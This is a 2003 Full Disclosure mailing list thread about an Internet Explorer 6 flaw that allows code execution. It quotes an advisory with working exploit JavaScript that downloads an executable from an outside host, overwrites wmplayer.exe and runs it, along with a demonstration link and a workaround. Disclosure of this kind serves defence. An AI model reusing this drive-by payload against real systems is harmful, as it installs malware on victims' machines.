Full Disclosure mailing list archives
Re: Internet explorer 6 on windows XP allows exection of arbitrary code
From: jelmer <jkuperus () planet nl>
Date: Fri, 12 Sep 2003 11:29:29 +0200
when viewing mail in recent versions of outlook it operates in the restricted zone ,eg no active scripting allowed to run, so these wont be exploitable unless someone proofs otherwise that is ;) ----- Original Message ----- From: "Kristian Hermansen" <khermansen () ht-technology com> To: "Full Disclosure" <full-disclosure () lists netsys com> Sent: Friday, September 12, 2003 2:40 AM Subject: Re: [Full-disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
Wow, this one is pretty scary. Nice work putting it together. Does
anyone
know if Outlook is exploitable with this? I'd think that Outlook would
not
try to play the media file, but I'm not quite sure. Wow, what a rush of pretty critical bugs lately!!! Kris Hermansen ----- Original Message ----- From: "jelmer" <jkuperus () planet nl> To: <bugtraq () securityfocus com> Cc: <full-disclosure () lists netsys com> Sent: Thursday, September 11, 2003 6:31 PM Subject: [Full-disclosure] Internet explorer 6 on windows XP allows
exection
of arbitrary codeInternet explorer 6 on windows XP allows exection of arbitrary code DESCRIPTION : Yesterday Liu Die Yu released a number series of advisories concerning internet explorer by combining on of these issues with an earlier issue I myself reported
a
while back You can construct a specially crafted webpage that can take any action
on
ausers system including but not limited to, installing trojans, keyloggers, wiping the users harddrive etc. TECHNICAL EXPLAINATION : Internet explorer 6 comes with a media sidebar in wich you can load andplaymediaclips without even leaving the browser. when you instruct the mediabar to load
a
file from an unknown host or the HTTP status returned by an existing host indicates
an
error this media bar displays an error page inside the media bar namely res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path res URL's are treated as being in the "my computer zone" and are loadedfromthe users filesystem perfect conditions for the issue I describe on
http://www.mail-archive.com/full-disclosure () lists netsys com/msg06791.html
To work. now all that is needed is a way to inject this exploit code
into
this page This method was graciously provided by Liu Die Yu as you can read on http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0 Combining these issues we get something like : --snip-- <textarea id="code" style="display:none;"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows MediaPlayer\\wmplayer.exe",2);location.href = "mms://"; </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); </script> --snip-- error.jsp is a jsp page that consists of one line, namely <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %> DEMONSTRATION : A demonstration is provided at : http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm WORKAROUND : Disable active scripting or do "the sensible thing" and pick anotherbrowsersuch as the excellent mozilla firebird. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Kristian Hermansen (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Thor Larholm (Sep 11)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Dj MegaWorld (Sep 12)
- <Possible follow-ups>
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code http-equiv () excite com (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Drew Copley (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Kristian Hermansen (Sep 11)